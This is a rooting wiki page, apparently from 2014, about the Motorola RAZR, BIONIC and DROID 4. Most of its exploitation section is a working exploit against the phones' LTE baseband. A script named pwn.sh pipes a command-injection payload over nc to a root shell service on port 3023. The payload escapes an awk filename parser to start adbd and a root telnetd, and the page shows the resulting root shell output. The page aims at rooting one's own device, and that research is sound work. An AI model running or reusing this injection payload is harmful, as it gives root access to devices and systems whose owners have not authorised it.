Difference between revisions of "Moto RAZR, BIONIC, DROID 4"
m (Zenofex moved page Moto Droid RAZR to Moto RAZR, BIONIC, DROID 4) |
|
(No difference)
|
Revision as of 10:37, 20 August 2014
"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."
This page will be dedicated to a general overview, descriptions, and information related to the Motorola Droid RAZR, BIONIC, DROID4.
Purchase
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the Motorola Droid RAZR at Amazon
Exploitation
- This attack works on the LTE basedband on the Motorola Razr, Bionic, and Droid4
Android communicates with the baseband over an internal USB network
192.168.157.1 (Android) <- usb network -> 192.168.157.2 (LTE)
usb1 Link encap:Ethernet HWaddr 02:21:00:1D:34:FB inet addr:192.168.157.1 Bcast:192.168.157.7 Mask:255.255.255.248 inet6 addr: fe80::21:ff:fe1d:34fb/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:916 errors:0 dropped:0 overruns:0 frame:0 TX packets:910 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:337347 (329.4 KiB) TX bytes:63269 (61.7 KiB)
Included in the Android filesystem is a /system/bin/wrigley-dump.sh which demonstrates usage:
... for cmd in "state" "logs" "files" "panic" "atvc"; do echo "-o wrigley $cmd" | nc -w 10 192.168.157.2 3002 done
Port 3002 redirects to a shell script running as root:
... dumpBinFile() local inFilePath="$1" local outFilePath="$2" case $(echo | busybox awk '{print substr("'"${outFilePath}"'",0,1)}') in "/") ;; *) outFilePath="/$outFilePath" esac ...
Note the strange filename parsing using awk.
In addition to port 3002 there's also a limited shell running on port 3023.
pwn.sh:
echo "\ntouch '/pds/public/x\",0,1);system(\"start\${IFS}adbd;start\${IFS}telnetd-root\");(\"'\nexit" | nc 192.168.157.2 3023 echo "files" | nc 192.168.157.2 3002 > /dev/null adb pull /system/xbin/telnet /data/local/tmp/telnet chmod 755 /data/local/tmp/telnet /data/local/tmp/telnet 192.168.157.2
Output:
Entering character mode Escape character is '^]'. root@(unknown):/# root@(unknown):/# cat /proc/cpuinfo Processor : ARM926EJ-S rev 5 (v5l) BogoMIPS : 189.57 Features : swp half thumb fastmult edsp java CPU implementer : 0x41 CPU architecture: 5TEJ CPU variant : 0x0 CPU part : 0x926 CPU revision : 5 Hardware : Wrigley 3G DatacardLTE Revision : 0000 Serial : 0000000000000000 root@(unknown):/# whoami root